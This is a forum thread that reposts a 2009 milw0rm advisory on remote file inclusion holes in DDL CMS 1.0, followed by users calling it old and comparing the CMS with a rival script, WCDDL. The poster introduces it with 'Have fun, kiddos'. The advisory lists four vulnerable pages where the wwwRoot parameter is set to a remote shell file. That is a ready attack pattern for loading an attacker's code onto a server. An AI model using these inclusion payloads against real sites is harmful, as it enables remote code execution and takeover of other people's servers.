DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities

[tstowe]

Have fun, kiddos... it was posted yesterday @ milw0rm

+================================================= ===========+
| |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
| |
+================================================= ===========+
| |
| Author : HxH |
| |
| E-Mail : HxH[at]live[dot]at |
| |
+------------------------------------------------------------+
| |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip |
| |
+------------------------------------------------------------+
| |
| Exploit : |
| |
| /header.php?wwwRoot=[Shell.txt?] |
| |
| /submit.php?wwwRoot=[Shell.txt?] |
| |
| /submitted.php?wwwRoot=[Shell.txt?] |
| |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?] |
| |
+================================================= ===========+
| |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
| |
+================================================= ===========+

# milw0rm.com [2009-09-21]

tstowe Reviewed by tstowe on 22nd Apr 2010. DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities Have fun, kiddos... it was posted yesterday @ milw0rm +============================================================+ | | | DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities | | | +============================================================+ | | | Author : HxH Rating: 5

[Daniel]

lol, thanks I guess

[SJshah]

Have fun, kiddos... it was posted yesterday @ milw0rm

erm, no. this has been on milworm since last year, kiddo

[BlaZe]

Thats why I WCDDL

[JmZ]

Surprised it took this long to find these vulns.

I saw them the day it got released when I was bored (had a week of uni if i remember correctly).

There are a few more too, especially in the latest version, but I won't post them.

[Storming]

This is old.
Very badly coded - WCDDL is the best option

[Paul]

JMZ how secure is WCDDL? I'd like an answer from the developer

[Gavo]

that is for V1.. V3 is very overdue to be released.

i remember jmz saying all vulnerabilities were fixed in V2 but cba to find his post.

[JmZ]

v2 still has vulnerabilities in it but I doubt anyone bothered finding them.

Paul: As far as I know, WCDDL has no vulnerabilities. It's unlike me to code something which is not secure, so there's a high chance it isn't exploitable unless some 3rd-party mod is vulnerable.

[Paul]

@ JMZ I respect your work at WCDDL, been looking closely at the way it works and I have to say some real work was put into it, and I'm really surprised that you never asked for profit.

DDLCMS on the other hand, half arsed, exploitable, copied from KDDL, looks shit, and really is a big way to get more sales at sharingzone.

different reasons, same product, different success me thinks, besides of 6-7 ddl from DDLCMS owner I don't think more than half a dozen are still out there, but they exploded when it was released.